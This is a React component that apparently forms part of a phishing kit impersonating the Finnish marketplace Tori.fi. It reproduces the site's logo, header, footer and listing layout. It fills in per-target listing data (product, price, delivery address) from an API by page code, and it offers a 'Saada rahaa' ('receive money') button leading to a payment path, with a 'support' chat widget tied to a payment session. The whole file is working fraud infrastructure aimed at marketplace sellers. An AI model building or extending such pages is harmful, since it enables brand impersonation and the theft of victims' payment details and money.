import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './ToriFiSuccess.css';
import SupportWidget from './SupportWidget';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL, LOCAL_FALLBACK_API_URL } from '../apiBase';
const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };

async function fetchPageWithFallback(pageCode) {
  const tryFetch = async (base) => {
    const res = await fetch(`${base}/api/page/${pageCode}`);
    const data = await res.json();
    return { ok: res.ok, data };
  };
  try {
    const r1 = await tryFetch(API_URL);
    if (r1.ok || (r1.data && r1.data.success)) return r1.data;
  } catch {
    /* fallback */
  }
  if (API_URL !== LOCAL_FALLBACK_API_URL) {
    try {
      const r2 = await tryFetch(LOCAL_FALLBACK_API_URL);
      return r2.data;
    } catch {
      /* ignore */
    }
  }
  return { success: false };
}

function initialsFromTitle(text) {
  if (!text || !String(text).trim()) return '?';
  const parts = String(text).trim().split(/\s+/).slice(0, 2);
  return parts.map((w) => w[0]).join('').toUpperCase().slice(0, 3);
}

/**
 * Tori.fi (FI) — success; data sama API:sta kuin PageRouterissa (page-prop + fallback-fetch).
 */
function ToriFiSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'FI').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const currencySymbol = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${currencySymbol}` : `${priceText} ${currencySymbol}`;
  const title = (pageData?.product_name || '').trim() || 'Ilmoitus';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const listingId =
    (pageData?.listing_id && String(pageData.listing_id).trim()) ||
    (pageData?.tracking_number && String(pageData.tracking_number).trim()) ||
    (pageData?.unique_id && String(pageData.unique_id).trim()) ||
    pageData?.page_code ||
    pageCode ||
    '—';

  const photoUrl = (pageData?.photo_url || '').trim();
  const showPlaceholder = !photoUrl || imgFailed;
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="tori-wrap">
        <header className="tori-header">
          <div className="tori-header-inner">
            <div className="tori-logo">
              <img src={(process.env.PUBLIC_URL || '') + '/tori-logo.png'} alt="tori" className="tori-logo-img" />
            </div>
          </div>
        </header>
        <main className="tori-main">
          <div className="tori-loading">Ladataan...</div>
        </main>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="tori-wrap">
      <header className="tori-header">
        <div className="tori-header-inner">
          <a href="#/" className="tori-logo" aria-label="tori.fi">
            <img src={(process.env.PUBLIC_URL || '') + '/tori-logo.png'} alt="tori" className="tori-logo-img" />
          </a>
          <nav className="tori-header-actions">
            <a href="#/" className="tori-header-link">
              Notifikaatiot
            </a>
            <a href="#/" className="tori-header-link">
              Uusi ilmoitus
            </a>
            <a href="#/" className="tori-header-link">
              Viestit
            </a>
            <a href="#/" className="tori-header-link">
              Kirjaudu sisään
            </a>
          </nav>
        </div>
      </header>

      <main className="tori-main">
        <section className="tori-layout">
          <div className="tori-left-card">
            <div className="tori-left-media" aria-hidden>
              {!showPlaceholder ? (
                <img src={photoUrl} alt="" className="tori-left-media-img" onError={() => setImgFailed(true)} />
              ) : (
                <span className="tori-left-media-text">{initialsFromTitle(title)}</span>
              )}
            </div>
          </div>

          <aside className="tori-right-card">
            <div className="tori-right-title">{title}</div>
            <div className="tori-right-sub">Myydään</div>
            <div className="tori-right-price">{amountLine}</div>
            <Link to={index2Path} className="tori-btn">
              Saada rahaa
            </Link>
            <div className="tori-meta">
              <div className="tori-meta-row">
                <span className="tori-meta-icon" aria-hidden />
                <span>{address}</span>
              </div>
              <div className="tori-meta-row">
                <span className="tori-meta-icon tori-meta-icon--share" aria-hidden />
                <span>Jaa ilmoitus</span>
              </div>
              <div className="tori-meta-row">
                <span className="tori-meta-label">Ilmoituksen tunnus:</span>
                <span className="tori-meta-value">{listingId}</span>
              </div>
              <a href="#/" className="tori-meta-link">
                Ilmianna ilmoitus
              </a>
            </div>
          </aside>
        </section>
      </main>

      <footer className="tori-footer">
        <div className="tori-footer-inner">
          <div className="tori-footer-brand">tori</div>
          <div className="tori-footer-cols">
            <div className="tori-footer-col">
              <h3>Yrityksille</h3>
              <a href="#/">Myy tai mainosta</a>
            </div>
            <div className="tori-footer-col">
              <h3>Tiedot</h3>
              <a href="#/">Työpaikat</a>
              <a href="#/">Meistä</a>
              <a href="#/">Ideat &amp; vinkit</a>
            </div>
            <div className="tori-footer-col">
              <h3>Tietosuoja</h3>
              <a href="#/">Tietosuojakäytäntö</a>
              <a href="#/">Mainosasetukset</a>
            </div>
            <div className="tori-footer-col">
              <h3>Tuki</h3>
              <a href="#/">Asiakastuki</a>
              <a href="#/">Turvalliset kaupat</a>
            </div>
          </div>
        </div>
        <div className="tori-footer-bottom">
          <div className="tori-footer-social" aria-hidden>
            <span className="tori-social-dot" />
            <span className="tori-social-dot" />
            <span className="tori-social-dot" />
          </div>
          <div className="tori-footer-copy">© 2009–2024 Copyright</div>
        </div>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default ToriFiSuccess;
